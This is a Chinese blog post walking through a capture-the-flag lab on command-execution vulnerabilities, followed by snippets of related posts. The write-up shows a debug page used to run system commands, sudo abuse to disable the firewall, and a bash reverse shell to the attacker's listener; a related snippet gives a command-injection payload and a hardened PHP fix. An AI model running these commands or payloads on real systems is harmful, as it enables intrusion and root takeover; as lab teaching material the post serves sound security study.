CTF-命令执行

最新推荐文章于 2024-12-17 20:32:28 发布
原创 最新推荐文章于 2024-12-17 20:32:28 发布 · 709 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

命令执行漏洞

当应用需要调用一些外部应用程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system、exec、shell_exec等,当用户可以控制命令执行函数中的参数时,将可以注入恶意命令到正常命令中,造成命令执行攻击。
调用这些函数执行系统命令的时候,如果将用户的输入作为系统命令的参数拼接到命令行中,有没有多虑用户输入的情况下,就会造成命令执行漏洞。

实验环境

攻击机:192.168.0.25
靶机:192.168.0.26

实验流程

  • 端口扫描
    8080端口开放,HTTP服务
    在这里插入图片描述
    尝试访问8080端口的HTTP服务
    网站使用Tomcat服务器搭建,并且拿到网站主目录
    在这里插入图片描述
  • 网站信息探测
    敏感目录:/test.jsp
    在这里插入图片描述尝试访问该敏感页面
    通过页面描述可知这是用于检查/tmp是否有可疑内容的调试页面
    在这里插入图片描述尝试执行系统命令,能够列出/tmp目录下面的文件
    在这里插入图片描述查看/home目录下面的内容,以此判断系统中的用户有哪些
    通过显示结果判断系统中有一个普通用户——bill
    在这里插入图片描述还可以通过页面上的命令执行功能获取系统中的信息获取读取敏感文件
    在这里插入图片描述
  • 漏洞利用
    使用ssh执行root权限的命令,使用ssh 用户名@localhost登录服务器不许要身份验证
    查看bill用户使sudo命令的权限
    在这里插入图片描述尝试使用sudo命令执行命令,关闭靶机的防火墙
    注意:关闭防火墙使用的命令和操作系统的类型相关,因为靶机是Ubuntu的操作系统,系统中默认的管理防火墙的工具是ufw。
    注意:ufw是Ubuntu系统中基于iptables的防火墙管理工具。
    有关于ufw详信参考链接:https://blog.youkuaiyun.com/bigdata_mining/article/details/80699180
    在这里插入图片描述在这里插入图片描述
  • 权限提升
    攻击者监听端口,靶机执行命令利用bash反弹shell,直接获取root用户权限
    攻击者:nc -lvvp 4444
    靶机:ssh bill@localhost sudo bash -i >& /dev/tcp/192.168.0.25/4444 0>&1
    在这里插入图片描述获取flag
    在这里插入图片描述
CTF命令执行
afei001
03-29 861
练习环境     攻击机:kali     靶机:Ubuntu 17.04 1.发现靶机,进行端口扫描 root@afei:~# ifconfig eth0 eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.3.150 netmask 255.255.255.0 bro...
CTF-命令执行部分总结
weixin_44770698的博客
05-29 2000
因为自己是小白,还是想着尽量快一点的学习到许多知识,最近又做了CTFshow里面的部分萌新题,这里总结一下其中的部分萌新WEB题。 web 9 要求我们使用GET方式传入c参数,参数中还要匹配到system或者exec等关键字,这里算是一个小坑,还以为是不能有这些关键字,还尝试了passthru、和拼接绕过......很尴尬。 这个比较简单我们使用system来执行查看config.php就可以了。 web 10 这个题的含义就是正则匹配到system、exec等,则会提示你cmd e
CTF练习:HTTP服务之命令执行
qq_43233085的博客
12-05 681
CTF练习:HTTP服务之命令执行环境准备信息收集漏洞利用 靶机地址: 链接: https://pan.baidu.com/s/1axC2PaXqscbZKNpTq3dTkg 提取码: t8uz 环境准备 开启两台机器,一台靶机一台kali攻击机,配置好桥接网络,使其在同一网段内。 查看攻击机kali的IP,为172.19.91.88 ifconfig 查看靶机的IP,为172.19.91.8...
gmailc2:一款基于Google SMTP的完全无法检测的C2服务器
qq_53058639的博客
07-24 1666
1、持久化;2、支持Shell访问;3、查看系统信息;4、…
CTF-命令执行漏洞(集成工具探测)
su__xiaoyan的博客
01-18 1273
实验环境 攻击者:192.168.0.25 靶机:192.168.0.36 实验流程 检测与靶机之间的网络连通性 信息收集 利用kali中的集成工具——sparta进行信息探测,该工具中集成了nmap、nikto、hydra、whatweb以及dirbuster等多种工具。 点击添加靶机,可以添加单个IP地址也可以添加IP地址范围 靶机IP地址添加完成后,会自动使用nmap进行端口扫描,对于探测出来的web站点进行详细信息探测,并对网站页面进行截图。 除此之外还可以根据不同端口的具体情况由用户选择进
java红酒网站源码-ctf-katana:ctf-武士刀
06-05
要尝试以匿名用户的身份列出共享,请执行此操作(由于某些奇怪的原因,这并不总是有效) smbmap -H 10.10.10.125 -u anonymous 或者您可以尝试: smbmap -H 10.10.10.125 你可以像这样指定一个域: smbmap -H 10.10....
CTF-渗透测试靶场-命令执行
Demon
11-06 371
CTF8-渗透测试靶场-命令执行
CTF-命令注入(代码执行漏洞)
su__xiaoyan的博客
01-20 2332
实验环境 攻击机:172.20.10.5 靶机:172.20.10.4 实验流程 端口扫描 端口详细信息探测 命令:nmap -T4 -A -v 靶机IP地址 发现网站下的robots.txt中包含几个敏感目录 web站点详细信息探测 web目录爆破 访问robots.txt,对其中的敏感目录进行查看 其中/nothing为404页面,但是和正常的4014页面不同 查看源代码,发现网站管理员在源代码中存储了常用的密码 其中/tmp和/uploads均为空目录 尝试探测改地址允许使用的请求方法,
ctf命令执行
qq_46540840的博客
03-24 940
文章目录前言一、知识要点二、举栗子1.CTFHub 技能树 综合过滤2.CTFHub 第一题附上一道简单题 前言 这里整理了一下基础题常用的过滤替代后续等深入学习时会再大幅不冲. 入门的话推荐ctfhub命令执行,上面有基础题适合小白入门比如还没入门的我wuwu… 一、知识要点 空格过滤替换品(常用为以下几个) %09(Tab键) IFS,IFS,IFS,IFS9,9,9,{IFS},$IFS < <> 重定向符 cat过滤替换品 more:一页一页的显示内容(linux环境下文本
CTF-命令执行【超详细】
qq_53058639的博客
02-02 889
作者简介:不知名白帽,网络安全学习者。
CTF下的命令执行
热门推荐
Lemon's blog
04-28 1万+
前言: 之前学习过命令执行,但不是太深入,这次通过题目的训练来深入学习一下命令执行
CTF知识集-命令执行
星河梦瑾的博客
12-17 1397
includePATHAlinux的shell如果过滤空格,可以截取环境,例如执行命令env,会出现一堆命令。
CTF之代码/命令执行
m0_62102520的博客
07-13 470
1.命令执行介绍 2.命令执行原理 3.代码执行介绍
ctfshow-命令执行
weixin_45794666的博客
12-19 4470
命令执行 反引号`` 反引号``即命令替换 是指Shell可以先执行``中的命令,将输出结果暂时保存,在适当的地方输出 单引号,双引号 适用条件:过滤了字符串 放在shell命令中,绕过正则匹配且不影响原意 空格绕过 > < <> 重定向符 %09(需要php环境) ${IFS} $IFS$9 {cat,flag.php} //用逗号实现了空格功能 %20 %09 读文件绕过(cat绕过) 适用条件:过滤了cat 1)more:一页一页的显示档案内容 (2)less:与 mor
CTF命令执行学习笔记
qq_42911487的博客
10-31 3205
CTF命令执行学习笔记 php常见的命令执行函数(这里只谈命令执行不涉及代码执行) system、popen、shell_exec、exec、passthru、反引号(比如echo ls;反引号实际是shell_exec的另一种形式) //通常以以下形式出现,题外话eval中可以直接闭合php标签另起一个php... <?php $a=$_GET[1]; //一些过滤 system($a); ?> 命令执行绕过空格 1.$IFS、$IFS$9、$IFS$@、$IFS$*等 在linux中IFS
CTF命令执行RCE
qq_53099119的博客
04-02 4546
md5() 函数计算字符串的 MD5 散列。md5() 函数使用 RSA 数据安全,包括 MD5 报文摘要算法。来自 RFC 1321 的解释 - MD5 报文摘要算法:MD5 报文摘要算法将任意长度的信息作为输入值,并将其换算成一个 128 位长度的"指纹信息"或"报文摘要"值来代表这个输入值,并以换算后的值作为结果。MD5 算法主要是为数字签名应用程序而设计的;
ctf命令执行小结
舞动的獾
10-04 4723
1.相关函数 eval函数eval函数能够将字符串当作命令去执行 需要被执行的字符串 代码不能包含打开/关闭 PHP tags。比如, ‘echo “Hi!”;’ 不能这样传入: ‘<?php echo "Hi!"; ?>’。但仍然可以用合适的 PHP tag 来离开、重新进入 PHP 模式。比如 ‘echo “In PHP mode!”; ?>In HTML mode!<...
ctf php命令执行漏洞
最新发布
02-19
### CTF竞赛中PHP命令执行漏洞 #### 漏洞利用原理 在CTF竞赛中,PHP命令执行漏洞通常涉及通过特定输入点向服务器发送恶意指令。当应用程序未正确过滤用户输入并将其作为参数传递给能够执行系统命令的函数时,就会发生此类漏洞。例如,在以下代码片段中: ```php <?php system("ping -c 1 " . $_GET['ip']); ?> ``` 如果`$_GET['ip']`未经适当验证,则攻击者可以通过精心构造URL来注入额外的命令[^1]。 #### 实际案例分析 考虑这样一个场景:假设存在一个网站允许访客查询某个IP地址的状态。该功能实现方式不当,直接将用户的输入附加到`ping`命令后面执行。此时,攻击者可能提交如下请求: ``` http://example.com/ping.php?ip=8.8.8.8;ls /etc/ ``` 这会导致服务器不仅会尝试Ping指定的目标(8.8.8.8),还会列出/etc目录下的文件列表[^3]。 #### 防护策略建议 为了防止这种类型的攻击,开发者应该采取多种安全措施: - **输入验证**:严格校验所有来自客户端的数据,确保只接受预期格式的内容。 - **转义特殊字符**:对于确实需要使用的动态部分,应采用合适的转义机制处理潜在危险符号。 - **最小权限原则**:运行Web应用的服务账户应当具有尽可能少的操作权限,即使被成功入侵也能减少损害范围。 - **禁用高风险函数**:除非绝对必要,否则应在php.ini配置文件里关闭那些容易引发安全隐患的功能,比如`disable_functions = exec, shell_exec, system...`等设置。 #### 示例防护改进后的代码 以下是经过加固处理过的版本,它增加了对传入数据的安全检查以及使用escapeshellarg()函数自动转义任何可能导致问题的元字符: ```php <?php $target_ip = escapeshellarg($_GET['ip']); // 对输入进行转义 if (filter_var($target_ip, FILTER_VALIDATE_IP)) { // IP有效性检测 echo "<pre>"; system("ping -c 1 $target_ip"); echo "</pre>"; } else { die('Invalid IP address.'); } ?> ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值